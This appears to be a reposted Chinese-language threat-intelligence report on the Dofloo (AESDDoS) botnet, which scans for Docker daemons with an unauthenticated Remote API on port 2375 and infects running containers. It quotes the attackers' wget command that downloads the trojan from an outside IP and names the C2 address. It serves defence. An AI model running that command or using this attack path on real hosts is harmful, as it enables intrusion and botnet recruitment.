1. 极安网首页
  2. 网络安全技术

Dofloo(AESDDoS)僵尸网络正批量扫描攻击Docker容器

一、背景

腾讯安全威胁情报中心检测到Dofloo(AESDDoS僵尸网络正批量扫描攻击Docker容器。部分云主机上部署的Docker容器没有针对远程访问做安全认证,存在Remote API允许未授权使用漏洞且暴露在公网,导致黑客通过漏洞入侵并植入Dofloo僵尸网络木马。一旦被植入Dofloo僵尸网络木马,受控云主机会泄露敏感信息、接收C2指令、执行DDoS攻击。

云计算兴起后,服务器硬件扩展非常便利,软件服务部署成为了瓶颈,Docker作为开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器,因而逐渐得到广泛应用。而开发者在部署Docker时未对相关服务进行正确合理的配置导致其容易成为黑客入侵的路径之一,之前已有H2Miner利用Docker漏洞进行入侵挖矿的案例被披露(

https://mp.weixin.qq.com/s/iNq8SdTZ9IrttAoQYLJw5A)。此次Dofloo僵尸网络入侵系统后,会搜集系统敏感信息并加密上传,接收C&C服务器指令,执行各类DDoS攻击。

二、详细分析

在此次攻击中,攻击者首先通过向端口2375(与Docker守护进程通信的默认端口)发送TCPSYN数据包对给定的IP范围进行批量扫描。确定开放端口的目标IP后,发送请求调用/containers/json接口获取正在运行中的容器列表,之后使用Docker EXEC命令执行以下shell访问公开主机中所有正在运行的容器并下载木马Linux2.7。

获取容器列表:

Dofloo(AESDDoS)僵尸网络正批量扫描攻击Docker容器-极安网

针对运行状态的容器利用Docker EXEC执行木马下载命令:

wget -P /tmp/ http[:]//49.235.238.111:88/Linux2.7

Dofloo(AESDDoS)僵尸网络正批量扫描攻击Docker容器-极安网

被下载的Dofloo僵尸网络木马Linux2.7会连接到49.235.238.111:48080来发送和接收来自攻击者的远程shell命令。

Dofloo(AESDDoS)僵尸网络正批量扫描攻击Docker容器-极安网

Dofloo(AESDDoS)僵尸网络正批量扫描攻击Docker容器-极安网

投稿文章,不代表 极安网 立场,转载请注明出处:https://secvery.com/708.html